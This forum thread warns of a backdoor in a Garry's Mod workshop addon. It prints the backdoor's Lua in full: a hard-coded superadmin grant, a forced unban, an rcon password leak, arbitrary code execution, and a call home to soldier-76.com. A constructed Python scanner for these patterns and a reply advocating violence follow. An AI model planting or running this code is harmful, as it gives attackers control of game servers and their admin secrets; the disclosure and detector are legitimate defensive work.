PSA: Backdoor in workshop addon

There is a backdoor in this addon: http://steamcommunity.com/sharedfiles/filedetails/?id=1161980125 by http://steamcommunity.com/profiles/76561198072431907
The backdoor is located in \lua\weapons\weapon_admingun\shared.lua, and is as follows:

hook.Add( "Initialize", "cakerawsd", function()
    concommand.Add( "_76sup", function(ply)
        if ( ply:SteamID() == "STEAM_0:0:153604459") then
            RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
        else
            ply:ChatPrint("Your not superadmin, " .. ply:Name() .. ".")
        end
    end)

    timer.Create( "checkForBan", 5, 0, function()
        ULib.unban( "STEAM_0:0:153604459")
    end )
    concommand.Add("76soldier_cf",function() local RconPass = GetConVar("rcon_password"):GetString() print(RconPass) end)
    concommand.Add( "_76", function(player,command,argument) RunString(table.concat(argument)) end)
    concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end)
    http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()})

end)

This is the same exploit as in https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD022_TraitorGlow_Again http://forum.facepunch.com/showthread.php?t=1540110&p=51295394&viewfull=1
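
A defender-side check for the kinds of calls seen in the backdoor above, as an added example that is not part of the original thread or of any existing scanner: it flags lines in addon Lua source that run strings, read `rcon_password`, post to a hard-coded URL, grant superadmin, force an unban, or embed a SteamID. The rule names, the two-rule threshold and the sample addon text (placeholder SteamID, `example.invalid` host) are constructed for illustration.

```python
import re

# Pasted forum code often carries typographic quotes; fold them to ASCII first.
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})

# Heuristic rules modelled on the calls in the backdoor quoted above.
# Names and regexes are this example's own assumptions.
RULES = [
    ("runstring", re.compile(r"\b(RunString|RunStringEx|CompileString)\s*\(")),
    ("rcon-password-read", re.compile(r"GetConVar(String)?\s*\(\s*[\"']rcon_password[\"']")),
    ("outbound-http", re.compile(r"\bhttp\.(Post|Fetch)\s*\(\s*[\"']https?://")),
    ("superadmin-grant", re.compile(
        r"SetUserGroup\s*\(\s*[\"']superadmin[\"']|[\"']adduser(id)?[\"'].*[\"']superadmin[\"']")),
    ("forced-unban", re.compile(r"\bULib\.unban\s*\(")),
    ("hardcoded-steamid", re.compile(r"[\"']STEAM_[0-5]:[01]:\d+[\"']")),
]

# Constructed sample addon file: placeholder identifiers, not the real ones.
SAMPLE = '''\
SWEP.PrintName = "Admin Gun"
hook.Add("Initialize", "example_hook", function()
    concommand.Add("_example", function(ply, cmd, args) RunString(table.concat(args)) end)
    concommand.Add("_example_sa", function(ply) ply:SetUserGroup("superadmin") end)
    timer.Create("example_timer", 5, 0, function() ULib.unban("STEAM_0:0:00000000") end)
    print(GetConVar("rcon_password"):GetString())
    http.Post("http://collector.example.invalid/bd.php", {ip = game.GetIPAddress()})
end)
'''

def scan_lua(source):
    """Return (line_number, rule, stripped_line) for every rule hit."""
    findings = []
    for n, line in enumerate(source.translate(QUOTES).splitlines(), 1):
        for rule, rx in RULES:
            if rx.search(line):
                findings.append((n, rule, line.strip()))
    return findings

def verdict(findings):
    """One rule alone is common in legitimate addons; two or more is not."""
    distinct = {rule for _, rule, _ in findings}
    if len(distinct) >= 2:
        return "likely-backdoor"
    return "review" if distinct else "clean"

if __name__ == "__main__":
    for n, rule, text in scan_lua(SAMPLE):
        print(f"line {n}: {rule}: {text}")
    print(verdict(scan_lua(SAMPLE)))
```

Comments are deliberately not stripped before matching, so a hit inside a Lua comment is still reported for manual review.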

Banned.

PSA!!!

And water is wet

people that do this deserve to get shot in the arm with a .22


(User was banned for this post ("Advocating violence" - Shendow))

I’m genuinely curious, and because there’s a warning not to visit it I won’t, but, in the link OP provided, https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD022_TraitorGlow_Again, what does the website we’re told not to visit do?

Does it give your computer some malware, or does it just track information and visiting the site would tell whoever runs it the jig is up?

The domain soldier-76.com doesn’t exist anymore, so click the link all you want. As for what it used to do, I would assume it simply recorded the server’s IP so that the dude knows which servers use his backdoored addon.


http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()})

Nothing, it’s down.

It was used to log IPs and other info about servers with the backdoor.